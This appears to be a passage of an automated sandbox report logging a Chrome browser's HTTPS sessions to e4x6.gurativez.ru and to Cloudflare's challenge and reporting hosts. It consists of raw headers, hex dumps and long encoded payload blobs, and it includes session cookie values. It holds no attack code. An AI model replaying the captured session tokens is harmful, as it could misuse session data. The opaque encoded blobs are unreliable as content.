                                                                                              Data Ascii: CXn6GfoNSQoR0h2eGTmWDfX5jhn6SmYVYh2+SXIiQapmNl2+lfJV0qKacpoaqcJ2rrWugkpKmqnquta66unm6eKGaf5KggcWHorycgLi/o7DNp7bUyKfOqKO50b2X07zcoLi30bPGp+fFvbvd5cfr7uqwwcLXz9TX9svT99TW7vC+xAT+x8Da8733DO4PDd7S7Qfj1gQECtYX0hLYDPvb3SIh7/Px+/oVFukZIu36IevuJh7sEwUnMywrKxAKCT
                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 63 57 57 41 64 49 6c 46 61 6f 74 67 61 4a 52 30 54 5a 65 42 6a 48 46 78 5a 34 32 53 63 48 32 53 6b 6d 4a 67 68 47 31 63 68 48 79 63 67 4a 4f 55 5a 6d 52 6c 6a 36 65 4b 67 49 4a 39 6a 6f 4f 30 70 32 79 62 6b 4c 61 4d 6d 36 69 5a 73 48 6d 50 75 72 4f 79 73 38 65 71 77 73 61 64 72 4d 53 48 69 4b 48 49 77 4d 33 4f 31 4b 2f 4e 71 63 75 56 74 4c 36 33 77 63 79 66 72 70 79 74 6f 61 44 47 76 74 62 43 76 61 58 5a 71 4f 2f 74 35 65 76 4c 78 2f 48 44 30 4c 4c 57 78 39 62 61 32 75 7a 56 75 65 2f 75 41 4e 2b 2b 37 2b 50 6b 77 51 62 46 34 4f 72 6b 78 78 50 72 37 51 4c 79 38 52 4d 57 39 52 7a 62 38 76 66 58 47 64 62 39 42 42 6a 77 2b 75 41 41 48 2f 37 31 39 41 45 69 42 52 77 62 43 2f 48 78 43 78 49 6d 42 76 63 34 39 54 55 5a 45 69 6f 6f 46 42 59 38 2b 6a 34 77 42 52 49
                                                                                              Data Ascii: cWWAdIlFaotgaJR0TZeBjHFxZ42ScH2SkmJghG1chHycgJOUZmRlj6eKgIJ9joO0p2ybkLaMm6iZsHmPurOys8eqwsadrMSHiKHIwM3O1K/NqcuVtL63wcyfrpytoaDGvtbCvaXZqO/t5evLx/HD0LLWx9ba2uzVue/uAN++7+PkwQbF4OrkxxPr7QLy8RMW9Rzb8vfXGdb9BBjw+uAAH/719AEiBRwbC/HxCxImBvc49TUZEiooFBY8+j4wBRI
                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 57 69 41 5a 34 32 51 61 49 5a 72 5a 34 47 4d 55 35 74 35 66 35 4a 71 58 33 64 7a 65 35 78 34 65 48 4e 68 70 48 4f 66 6d 47 6d 45 70 71 79 4b 67 72 43 7a 73 6f 39 79 72 70 68 36 65 4b 61 5a 64 37 65 66 6f 48 75 37 6b 70 2b 53 73 70 65 59 77 38 57 75 6d 73 62 47 72 4a 32 62 6b 6f 75 4d 77 73 4f 7a 32 4a 72 5a 72 70 58 5a 76 38 6e 68 6f 38 79 37 35 61 62 70 77 61 4c 6c 70 63 4f 6e 77 36 62 4c 71 75 32 75 78 4f 66 78 37 64 66 36 75 72 4c 6c 2f 50 50 33 76 73 73 42 33 4e 33 50 37 77 62 55 34 77 58 4b 33 51 37 67 30 4d 6e 36 42 77 37 69 42 66 51 49 35 77 66 33 2b 39 73 50 36 4e 62 74 2f 75 7a 31 37 77 41 62 47 43 4c 79 36 2b 6f 43 49 43 50 76 49 68 34 43 4d 43 4d 72 4a 44 66 78 39 6a 6f 2b 4f 7a 35 42 2f 67 31 43 50 79 41 63 52 54 49 6a 42 55 70 46 43 7a 64 4b
                                                                                              Data Ascii: WiAZ42QaIZrZ4GMU5t5f5JqX3dze5x4eHNhpHOfmGmEpqyKgrCzso9yrph6eKaZd7efoHu7kp+SspeYw8WumsbGrJ2bkouMwsOz2JrZrpXZv8nho8y75abpwaLlpcOnw6bLqu2uxOfx7df6urLl/PP3vssB3N3P7wbU4wXK3Q7g0Mn6Bw7iBfQI5wf3+9sP6Nbt/uz17wAbGCLy6+oCICPvIh4CMCMrJDfx9jo+Oz5B/g1CPyAcRTIjBUpFCzdK


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              20192.168.2.649781172.67.155.684436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:05 UTC1336OUTGET /favicon.ico HTTP/1.1
                                                                                              Host: e4x6.gurativez.ru
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://e4x6.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlA0ZjZaaWtlSXpkL2RLaG9Ja1BmZ3c9PSIsInZhbHVlIjoiYW54anBCNDl5b0VMMWcreGUvR1RUVnVqRWJUMVg3Myt4bnhMN0YxSjFmcGMyV0h5YWVySG1rRFhCY1R5emJOWXcySUtiU214VGhSUGtWRGVlVjJSRkd1elo0bFA1dkJDUkhJa2dBT09qdWlVNm5HNzRSODBpbmlSVkRXWTl2Nk0iLCJtYWMiOiI4OWNhMTA2ZmJiMTZlM2NlNDJkMGVmZTA4ZDY1NmU2MjdjM2NkZTFlMjg3NmQ3ZDhlNjc1MjU2NWExOGRlOTBiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlYxUDBHcVZRZTQyQUlYS2Q4QUVSSXc9PSIsInZhbHVlIjoiaHFoZzRqV3dKeUVJY1YxZWFraWg5dS9MaDMxeUNqcFpPcXp1SXJnOWNrSEplekxOZ2gwRDFFTWI5eEN0ejNjb1E5eG9zTHVSSCsxd0p3bzRxRDVqUzhTZUp5V1JTS3NVUDZySzQ1MHlEK2NkUVhtTVZvc0FvVVlqM29QOWJqV2wiLCJtYWMiOiI5MTIyNTViYzM4YmViOTdmYjgxMDlmZjZkNGNhZmY4OTQyZjk5Mzk0ZWIxMmVjMWM2MWJkOGVkODE0ODZkN2NjIiwidGFnIjoiIn0%3D
                                                                                              2024-12-19 13:36:06 UTC1061INHTTP/1.1 404 Not Found
                                                                                              Date: Thu, 19 Dec 2024 13:36:06 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=14400
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QidWJn8h1kTF%2F2UVtlv47sBy6Ef%2BbjVR0U%2Fj91lo5MXu7Gu%2FYksTJaoywvegvlclBGln6Y0Nz6gKWK1JEVMordrCsvyCAcCwxbyTtKvAazU6pCIvXayWGzDbSBzN1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Vary: Accept-Encoding
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=48431&min_rtt=48360&rtt_var=13735&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2248&delivery_rate=59341&cwnd=251&unsent_bytes=0&cid=01707049fee34fde&ts=186&x=0"
                                                                                              CF-Cache-Status: MISS
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c792b9904387-EWR
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=5068&min_rtt=1990&rtt_var=2777&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1914&delivery_rate=1467336&cwnd=47&unsent_bytes=0&cid=c6d37e2ef8d68205&ts=968&x=0"
                                                                                              2024-12-19 13:36:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              21192.168.2.649784104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:06 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1491058030:1734614036:lGnvY1elWyH7EhRRkOdPFDBDdTK2Q-wX130xIM0yJB4/8f47c7718f624386/7H8LG5SnqbO3T10Wvi8IaJOK4p16EBaa_PQ0ofUlBXE-1734615360-1.1.1.1-uFkKOZXfTSe_1mvdIu74Z9OPpAcKlUkRYImsDd1U2O350IQ4ldpJZv.sdf1vctVv HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:07 UTC379INHTTP/1.1 404 Not Found
                                                                                              Date: Thu, 19 Dec 2024 13:36:06 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 7
                                                                                              Connection: close
                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              cf-chl-out: OB5eP0ksm/NN/mPhfWAXxQnB7xrdcG5eyyU=$J7mVSuGORNaHDBRe
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c79acbbd43c1-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:36:07 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                              Data Ascii: invalid


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              22192.168.2.649787104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:07 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f47c7718f624386/1734615364486/nxr05CllTeOlRC3 HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qmivf/0x4AAAAAAAy6q7iduvs50k8-/auto/fbE/normal/auto/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:07 UTC200INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:36:07 GMT
                                                                                              Content-Type: image/png
                                                                                              Content-Length: 61
                                                                                              Connection: close
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c79e98d94379-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:36:07 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 19 08 02 00 00 00 94 c5 68 2b 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                              Data Ascii: PNGIHDRh+IDAT$IENDB`


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              23192.168.2.64979135.190.80.14436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:07 UTC538OUTOPTIONS /report/v4?s=QidWJn8h1kTF%2F2UVtlv47sBy6Ef%2BbjVR0U%2Fj91lo5MXu7Gu%2FYksTJaoywvegvlclBGln6Y0Nz6gKWK1JEVMordrCsvyCAcCwxbyTtKvAazU6pCIvXayWGzDbSBzN1w%3D%3D HTTP/1.1
                                                                                              Host: a.nel.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              Origin: https://e4x6.gurativez.ru
                                                                                              Access-Control-Request-Method: POST
                                                                                              Access-Control-Request-Headers: content-type
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:08 UTC336INHTTP/1.1 200 OK
                                                                                              Content-Length: 0
                                                                                              access-control-max-age: 86400
                                                                                              access-control-allow-methods: OPTIONS, POST
                                                                                              access-control-allow-origin: *
                                                                                              access-control-allow-headers: content-length, content-type
                                                                                              date: Thu, 19 Dec 2024 13:36:07 GMT
                                                                                              Via: 1.1 google
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              24192.168.2.649794104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:09 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f47c7718f624386/1734615364486/nxr05CllTeOlRC3 HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:09 UTC200INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:36:09 GMT
                                                                                              Content-Type: image/png
                                                                                              Content-Length: 61
                                                                                              Connection: close
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c7aafe3ec407-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:36:09 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 19 08 02 00 00 00 94 c5 68 2b 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                              Data Ascii: PNGIHDRh+IDAT$IENDB`


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              25192.168.2.649795104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:09 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f47c7718f624386/1734615364488/88a3ca94e2ef2da89ec1cf6ab37a3d19f9970f5034a44c54454b9f03bd8a57b0/w1RgJuScIFU0600 HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: max-age=0
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qmivf/0x4AAAAAAAy6q7iduvs50k8-/auto/fbE/normal/auto/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:09 UTC143INHTTP/1.1 401 Unauthorized
                                                                                              Date: Thu, 19 Dec 2024 13:36:09 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 1
                                                                                              Connection: close
                                                                                              2024-12-19 13:36:09 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 69 4b 50 4b 6c 4f 4c 76 4c 61 69 65 77 63 39 71 73 33 6f 39 47 66 6d 58 44 31 41 30 70 45 78 55 52 55 75 66 41 37 32 4b 56 37 41 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                              Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20giKPKlOLvLaiewc9qs3o9GfmXD1A0pExURUufA72KV7AAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                              2024-12-19 13:36:09 UTC1INData Raw: 4a
                                                                                              Data Ascii: J


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              26192.168.2.64979635.190.80.14436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:09 UTC478OUTPOST /report/v4?s=QidWJn8h1kTF%2F2UVtlv47sBy6Ef%2BbjVR0U%2Fj91lo5MXu7Gu%2FYksTJaoywvegvlclBGln6Y0Nz6gKWK1JEVMordrCsvyCAcCwxbyTtKvAazU6pCIvXayWGzDbSBzN1w%3D%3D HTTP/1.1
                                                                                              Host: a.nel.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 448
                                                                                              Content-Type: application/reports+json
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:09 UTC448OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 34 30 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 65 34 78 36 2e 67 75 72 61 74 69 76 65 7a 2e 72 75 2f 68 48 37 5f 43 4c 66 57 38 42 30 36 75 44 5a 62 46 6d 41 69 4c 77 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 35 35 2e 36 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70
                                                                                              Data Ascii: [{"age":0,"body":{"elapsed_time":3408,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://e4x6.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/","sampling_fraction":1.0,"server_ip":"172.67.155.68","status_code":404,"type":"http.error"},"typ
                                                                                              2024-12-19 13:36:09 UTC168INHTTP/1.1 200 OK
                                                                                              Content-Length: 0
                                                                                              date: Thu, 19 Dec 2024 13:36:09 GMT
                                                                                              Via: 1.1 google
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              27192.168.2.649802104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:11 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1491058030:1734614036:lGnvY1elWyH7EhRRkOdPFDBDdTK2Q-wX130xIM0yJB4/8f47c7718f624386/7H8LG5SnqbO3T10Wvi8IaJOK4p16EBaa_PQ0ofUlBXE-1734615360-1.1.1.1-uFkKOZXfTSe_1mvdIu74Z9OPpAcKlUkRYImsDd1U2O350IQ4ldpJZv.sdf1vctVv HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 31417
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                              CF-Chl-RetryAttempt: 0
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              CF-Challenge: 7H8LG5SnqbO3T10Wvi8IaJOK4p16EBaa_PQ0ofUlBXE-1734615360-1.1.1.1-uFkKOZXfTSe_1mvdIu74Z9OPpAcKlUkRYImsDd1U2O350IQ4ldpJZv.sdf1vctVv
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Origin: https://challenges.cloudflare.com
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qmivf/0x4AAAAAAAy6q7iduvs50k8-/auto/fbE/normal/auto/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:11 UTC16384OUTData Raw: 76 5f 38 66 34 37 63 37 37 31 38 66 36 32 34 33 38 36 3d 31 51 62 65 64 6f 52 78 46 35 51 52 46 63 78 52 48 55 39 55 66 63 33 55 49 55 73 65 6e 76 67 55 7a 52 63 55 4a 67 35 6b 52 37 55 5a 59 32 33 54 52 4b 55 31 65 52 6b 52 6e 33 55 35 43 55 61 77 55 64 55 70 62 62 62 77 33 55 33 58 55 37 72 57 25 32 62 6b 55 4c 65 52 7a 55 43 65 6f 77 55 2b 4c 43 77 32 55 50 53 56 32 55 69 4f 35 55 55 78 55 52 69 51 6f 55 32 46 76 63 50 46 79 39 66 31 4c 79 6f 63 64 31 52 55 69 46 55 39 56 55 46 4c 55 70 32 52 59 55 52 78 55 6f 49 77 55 57 4b 45 2d 6f 67 55 38 55 47 7a 62 6a 76 61 62 24 4a 71 55 6f 67 77 62 32 31 61 65 69 48 46 55 6b 6d 71 55 6e 49 67 7a 70 52 77 55 52 54 68 55 71 76 65 58 55 61 50 35 24 65 77 58 2b 77 4f 57 73 66 46 53 69 46 77 24 56 74 39 48 2d 4f 4f
                                                                                              Data Ascii: v_8f47c7718f624386=1QbedoRxF5QRFcxRHU9Ufc3UIUsenvgUzRcUJg5kR7UZY23TRKU1eRkRn3U5CUawUdUpbbbw3U3XU7rW%2bkULeRzUCeowU+LCw2UPSV2UiO5UUxURiQoU2FvcPFy9f1Lyocd1RUiFU9VUFLUp2RYURxUoIwUWKE-ogU8UGzbjvab$JqUogwb21aeiHFUkmqUnIgzpRwURThUqveXUaP5$ewX+wOWsfFSiFw$Vt9H-OO
                                                                                              2024-12-19 13:36:11 UTC15033OUTData Raw: 4a 55 33 67 6f 46 55 4b 55 6a 55 62 32 47 65 47 67 43 58 55 32 55 75 55 78 65 50 54 6f 7a 55 75 55 50 32 6f 52 55 47 55 52 5a 57 6f 55 32 65 4c 65 6f 57 55 48 54 63 65 55 4f 55 4f 65 52 6e 55 65 55 69 65 61 46 61 24 55 7a 55 70 43 52 50 55 79 65 63 6b 55 6a 55 34 65 4f 72 24 43 6f 42 55 63 76 61 39 44 67 33 66 2b 61 33 55 2d 42 46 55 49 50 55 52 32 35 55 6f 6e 65 24 33 47 67 55 47 55 4a 55 6f 6b 61 4b 6f 68 50 55 7a 55 6d 32 50 6b 75 62 61 55 6a 49 55 4a 62 61 33 55 66 46 35 74 55 47 55 54 6b 6f 6b 6f 4e 55 72 32 62 71 6f 4b 55 35 54 65 78 52 6f 65 4e 38 75 62 6f 68 55 24 67 70 53 61 37 55 6b 55 4f 33 61 37 55 57 55 50 67 52 7a 32 75 55 63 76 6f 4b 55 6e 55 63 32 33 58 55 49 55 4f 33 6f 6e 65 6b 55 33 78 6f 6e 65 70 55 70 39 76 39 55 24 33 6f 75 4a 77 55
                                                                                              Data Ascii: JU3goFUKUjUb2GeGgCXU2UuUxePTozUuUP2oRUGURZWoU2eLeoWUHTceUOUOeRnUeUieaFa$UzUpCRPUyeckUjU4eOr$CoBUcva9Dg3f+a3U-BFUIPUR25Uone$3GgUGUJUokaKohPUzUm2PkubaUjIUJba3UfF5tUGUTkokoNUr2bqoKU5TexRoeN8ubohU$gpSa7UkUO3a7UWUPgRz2uUcvoKUnUc23XUIUO3onekU3xonepUp9v9U$3ouJwU
                                                                                              2024-12-19 13:36:11 UTC330INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:36:11 GMT
                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                              Content-Length: 26296
                                                                                              Connection: close
                                                                                              cf-chl-gen: M2hr+qpnGLp2CqWMXSzkNCqN96JPDr3ZPpE9YfpDUMRJsnPaenqVF2ruaPr9ALkWe5Jjv8iPMDvm3LhY$tWQYsjWRJHa6tu+E
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c7b5d86f8c87-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:36:11 UTC1039INData Raw: 57 6d 35 71 64 34 47 47 6b 6e 75 48 64 55 68 7a 68 57 68 55 62 33 69 59 64 49 6c 5a 64 6f 43 4e 58 58 70 39 66 70 31 39 71 33 36 72 62 49 74 6c 65 4b 65 54 62 71 64 78 71 6f 47 6c 6d 5a 53 59 73 61 32 51 72 62 64 39 77 72 6d 2f 76 49 4f 37 76 62 4b 32 67 36 79 35 6e 38 4b 76 72 74 48 43 77 4c 37 4e 6a 35 4f 6e 72 63 32 5a 79 4e 2f 55 6e 39 37 42 31 4d 54 68 78 64 36 65 73 73 61 33 77 61 50 4e 33 39 44 74 7a 72 2b 2b 76 76 50 33 7a 65 62 5a 37 74 7a 35 30 62 71 38 2f 75 7a 69 76 77 48 45 2b 38 4c 67 38 38 58 4d 2b 65 63 41 7a 41 38 51 42 4e 37 73 42 4e 44 75 30 75 58 34 45 64 6b 59 35 78 73 5a 31 42 30 53 39 64 34 64 41 66 49 6e 34 52 6b 5a 2b 78 6a 70 4c 44 51 54 37 41 73 47 45 76 44 31 38 43 58 31 4f 41 6b 41 48 76 63 4f 4d 68 4e 45 4e 69 4d 33 42 53 59
                                                                                              Data Ascii: Wm5qd4GGknuHdUhzhWhUb3iYdIlZdoCNXXp9fp19q36rbItleKeTbqdxqoGlmZSYsa2Qrbd9wrm/vIO7vbK2g6y5n8KvrtHCwL7Nj5Onrc2ZyN/Un97B1MThxd6essa3waPN39Dtzr++vvP3zebZ7tz50bq8/uzivwHE+8Lg88XM+ecAzA8QBN7sBNDu0uX4EdkY5xsZ1B0S9d4dAfIn4RkZ+xjpLDQT7AsGEvD18CX1OAkAHvcOMhNENiM3BSY
